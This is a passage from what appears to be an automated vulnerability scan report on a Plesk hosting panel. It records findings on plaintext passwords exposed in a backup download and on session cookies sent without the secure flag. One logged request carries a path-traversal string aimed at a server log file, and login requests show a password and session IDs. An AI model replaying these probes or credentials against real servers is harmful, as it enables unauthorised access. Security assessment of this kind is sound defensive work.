Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 32065
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:59 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:58 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="6785858_z.xss.cx_info_1111191501.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:59 GMT
Connection: close

PK.........xs?.O.#    0...0..$...6785858_z.xss.cx_info_1111191501.xml.....0......    0........0..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modification of this file wi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.18. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 32065
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:59 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:58 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="6785858_z.xss.cx_info_1111191501.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:59 GMT
Connection: close

PK.........xs?.O.#    0...0..$...6785858_z.xss.cx_info_1111191501.xml.....0......    0........0..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modification of this file wi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

4. SSL cookie without secure flag set  previous  next
There are 142 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


4.1. https://50.22.21.242:8443/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://50.22.21.242:8443
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:32:39 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=565389ef1fcc3f50f25b02dfc435c66b; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:32:39 GMT
Content-Length: 1216


       <html><head>
       <meta charset="utf-8">
       <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
       <title></title>
       <script src="/javascript/common.js?plesk_version=psa-10.4.4-20111103.
...[SNIP]...

4.2. https://50.22.21.242:8443/admin/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://50.22.21.242:8443
Path:   /admin/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 50.22.21.242:8443
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:32:18 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=bc2a45d07f17db0216ec73bb0fbae143; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:32:18 GMT
Content-Length: 1216


       <html><head>
       <meta charset="utf-8">
       <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
       <title></title>
       <script src="/javascript/common.js?plesk_version=psa-10.4.4-20111103.
...[SNIP]...

4.3. https://50.22.21.242:8443/help.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://50.22.21.242:8443
Path:   /help.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help.php?context=../../../../../../../../../../etc/httpd/logs/error.log HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:52:17 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=05f76d98be673cb6f1e57430536e3b51; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 04:52:17 GMT
Content-Length: 8450

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.4. https://50.22.21.242:8443/login_up.php3  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://50.22.21.242:8443
Path:   /login_up.php3

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /login_up.php3 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/login_up.php3
Cookie: PLESKSESSID=565389ef1fcc3f50f25b02dfc435c66b
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

login_name=xssme%40z.xss.cx&passwd=omgitsthepasswd&locale_id=default&send=

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:33:21 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Plesk: PSA-Key/PLSK016937440000
Set-Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; path=/
Set-Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; path=/; secure; httponly
Set-Cookie: locale=en-US; expires=Sun, 18-Nov-2012 20:33:21 GMT; path=/
Set-Cookie: no_frames=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_root_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_login_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_logout_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:33:21 GMT
Content-Length: 1186


       <html><head>
       <meta charset="utf-8">
       <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
       <title></title>
       <script src="/javascript/common.js?plesk_version=psa-10.4.4-20111103.
...[SNIP]...

4.5. https://50.22.21.242:8443/smb/admin-home/installed-applications/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://50.22.21.242:8443
Path:   /smb/admin-home/installed-applications/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smb/admin-home/installed-applications/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Referer: https://50.22.21.242:8443/smb/admin-home
Cookie: locale=en-US

Response

HTTP/1.1 400 Bad Request
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:51:59 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=1e4e2ebab0cb833dd91dd94df059bc05; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 04:51:59 GMT
Content-Length: 0


4.6. https://50.22.21.242:8447/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://50.22.21.242:8447
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: 50.22.21.242:8447
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=personal-info; locale=en-US

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionID=butgahwixmhfgewbapllmakz


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="con
...[SNIP]...

4.7. https://50.22.21.242:8447/add_components.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://50.22.21.242:8447
Path:   /add_components.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /add_components.html HTTP/1.1
Host: 50.22.21.242:8447
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=personal-info

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionID=jjoorlkdrukdxfylzvqpaafj


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="con
...[SNIP]...

4.8. https://50.22.21.242:8447/preferences.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://50.22.21.242:8447
Path:   /preferences.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /preferences.html HTTP/1.1
Host: 50.22.21.242:8447
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8447/summary.html
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=xvrjftqfoptegfsokqpykqdf
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionID=xvrjftqfoptegfsokqpykqdf


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="con
...[SNIP]...

4.9. https://50.22.21.242:8447/select_components.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://50.22.21.242:8447
Path:   /select_components.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /select_components.html HTTP/1.1
Host: 50.22.21.242:8447
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8447/update_components.html?secret=kuhuxksjhcxnhtyhhxea&locale=en-US
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=personal-info; sessionID=jjoorlkdrukdxfylzvqpaafj

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionID=jjoorlkdrukdxfylzvqpaafj


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="con
...[SNIP]...

4.10. https://50.22.21.242:8447/summary.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://50.22.21.242:8447
Path:   /summary.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /summary.html HTTP/1.1
Host: 50.22.21.242:8447
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=personal-info; locale=en-US; sessionID=butgahwixmhfgewbapllmakz

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionID=lktjdvrcmsjeenlsehgglimo


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="con
...[SNIP]...

4.11. https://50.22.21.242:8447/update_components.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://50.22.21.242:8447
Path:   /update_components.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /update_components.html HTTP/1.1
Host: 50.22.21.242:8447
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=personal-info

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionID=brgsejtikfnhxaydtukmydma


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="con
...[SNIP]...

4.12. https://50.22.21.242:8443/admin/app/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/app/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/app/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fadmin%2Fapp%2F&src=%2Fsmb%2Fsettings%2Ftools&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=xvrjftqfoptegfsokqpykqdf; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:37:58 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=health; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:37:59 GMT
Connection: close
Content-Length: 9719

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.13. https://50.22.21.242:8443/admin/app/usage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/app/usage

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/app/usage HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/settings/tools
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:03:34 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:03:33 GMT
Content-Length: 18267

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.14. https://50.22.21.242:8443/admin/customer-service-plan/list/reset-search/true/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/customer-service-plan/list/reset-search/true/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer-service-plan/list/reset-search/true/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/home/admin
